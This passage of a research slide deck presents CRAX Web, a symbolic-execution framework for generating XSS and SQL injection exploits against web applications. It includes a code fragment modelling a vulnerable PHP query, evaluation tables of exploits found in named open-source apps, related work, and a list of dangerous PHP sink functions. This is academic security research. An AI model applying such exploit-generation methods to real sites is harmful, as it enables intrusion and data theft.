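    solution is the encoding (CRAXweb obtains it from the STP solver instead)."""
    return base64.b64encode(payload.encode()).decode()

def run_sample(user_param: str) -> Tuple[str, List[Tuple[int, int]]]:
    """Slide 41: mysql_query("SELECT * FROM user WHERE user=" . base64_decode($_GET['user']))."""
    query = Sym("SELECT * FROM user WHERE user=") + php_base64_decode(get_param(user_param))
    return query.text, sensor_mysql_query(query)
```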
• 49. Evaluation for Web Platform Independence
Test case ~= echo("A" x 50); OT = over time, >= 12 hr

                            PHP             JSP             Rails           Django          ASP
    Framework               -               -               3.2             0.96.1          -
    OS                      Linux           Linux           Linux           Linux           Windows
    Server                  Apache-2.2.19   Tomcat-7.0.2    Webrick         Built-in        IIS-5.1
    Kernel                  PHP-5.3.6       JDK-7u2         Ruby-1.9.3      Python-2.6.6    ASP-3.0
    Bind port               80              8080            3000            8000            80
    Symbolic response time  18.50s          6.72min         7.45min         32.72s          OT
    Without constraints     16.42s          3.25min         5.62min         24.02s          OT
• 50. Evaluation for XSS
OT = over time, >= 15 min

    Test case           | Lines of code | # of crawled requests | # of XSS (vulnerable) | # of XSS by MIT | Time per exploit | Time for all crawled requests
    Schoolmate-1.5.4    | 8,125         | 452                   | 19                    | 14              | 0.30min          | 107.78min + 30 OT
    Webchess-1.0.0rc2   | 6,504         | 410                   | 5 (4)                 | 13              | 0.80min          | 94.38min + 313 OT
    Faqforge-1.3.2      | 1,710         | 28                    | 4                     | 4               | 0.20min          | 5.74min
    EVE                 | 904           | 12                    | 2                     | 2               | 0.42min          | 4.94min

    Test case           | Lines of code | Platform | # of crawled requests | # of XSS (vulnerable) | Time per exploit | Time for all crawled requests
    SimpGB-1.49.02      | 41,296        | PHP      | 1,299                 | 33 (57)               | 0.91min          | 7.67hr + 334 OT
    DedeCms-5.6         | 84,544        | PHP      | 1,111                 | 11 (13)               | 0.48min          | 8.32hr + 9 OT
    Django-admin-0.96.1 | 3,558         | Python   | 5                     | 1                     | 5.29min          | 5.29min + 4 OT
    Discuz!-6.0         | 67,088        | PHP      | 613                   | 0 (1)                 | 0.85min          | 8.37hr + 12 OT
    Joomla-1.6          | 253,711       | PHP      | 215                   | 0 (7)                 | 2.17min          | 1.26hr + 117 OT
• 51. Evaluation for SQL Injection
TO = timeout

    Test case                      | Schoolmate 1.54 | Webchess 1.0.0rc2 | Faqforge 1.3.2 | EVE     | Testlink 1.8.4     | phprecipebook 2.24
    Lines of code                  | 8125            | 6504              | 1710           | 904     | 144913             | 52631
    CVE                            | -               | -                 | -              | -       | 2009-4238          | 2009-4883
    # of crawled requests          | 269             | 65                | 7              | 9       | 218                | 65
    # of SQLi (vulnerable)         | 12              | 6                 | 3              | 3       | 9                  | 6
    # of SQLi by MIT               | 6               | 12                | 1              | 2       | -                  | -
    Time per exploit               | 0.55min         | 0.39min           | 0.27min        | 0.24min | 3.24min            | 4.89min
    Time for all crawled requests  | 148.58min       | 25.15min          | 1.88min        | 2.12min | 706.4min (30 TO)   | 315.2min (32 TO)
    # of all solved constraints    | 952             | 15254             | 1104           | 934     | 18047              | 6322
• 53. Automatic Web Attack Generator
• Based on symbolic execution
– White box
– Only supports a specific language
• Based on the reply value of the server
– Black box
– Hard to handle encrypted data
• 54. Related Work

    Approach       | Year | Attacks / detected      | Generation algorithm                                        | W/B box | WB platform
    SAFELI         | 2008 | SQLI attack             | Statically inspect bytecode of the application              | WB      | Java
    Apollo         | 2008 | Malformed HTML detected | Concolic execution to find bugs in PHP web applications     | WB      | PHP
    Ardilla        | 2009 | XSS, SQLI attack        | Combines concrete and symbolic execution to cover paths     | WB      | PHP
    Kudzu          | 2010 | XSS, SQLI attack        | Attack grammar and symbolic execution                       | WB      | JavaScript
    PIUIVT         | 2010 | XSS, SQLI attack        | Perturbation based algorithm                                | WB      | Java
    MySQLInjector  | 2011 | SQLI attack             | Blind SQL injection based on True/False, Order by           | BB      | PHP
    NKSI Scan      | 2012 | SQLI attack             | Modularize SQL injection patterns to generate attack strings | BB      | JSP, ASP
    CRAX Web       | 2012 | XSS, SQLI attack        | Single path symbolic execution                              | WB      | XSS: all, SQLI: PHP
• 55. Related Work

    Approach       | Year | Attacks / detected      | W/B box | Platform
    SAFELI         | 2008 | SQLI attack             | W       | Java
    Apollo         | 2008 | Malformed HTML detected | W       | PHP
    Ardilla        | 2009 | XSS, SQLI attack        | W       | PHP
    Kudzu          | 2010 | XSS, SQLI attack        | W       | JavaScript
    PIUIVT         | 2010 | XSS, SQLI attack        | W       | Java
    MySQLInjector  | 2011 | SQLI attack             | B       | PHP
    NKSI Scan      | 2012 | SQLI attack             | B       | JSP, ASP
    CRAX Web       | 2012 | XSS, SQLI attack        | W       | XSS: all, SQLI: PHP
• 56. Conclusion
• A framework to generate exploits of web applications
– Supports XSS and SQL injection
(diagram: Web application -> CRAX Web -> Vulnerability report)
• A successful trial of symbolic execution for the Web by S2E
• 57. Future Work
• Implement this structure for other kinds of exploit generation

    Other web security issue                        Target functions
    Remote file inclusion / local file inclusion    include(), include_once(), require(), require_once() …
    Directory traversal                             fopen(), file(), unlink …
    Command injection                               system(), file() …
    Code injection                                  eval() …
    File upload                                     move_uploaded_file(), rename(), …

Liu Huan (劉歡), A Generic Web Testing and Attack Generation Framework
• 58. Open Doors to More Work
• Symbolic execution by S2E for
– PHP, Python
– JSP, Ruby
– ASP, Perl
– Node JS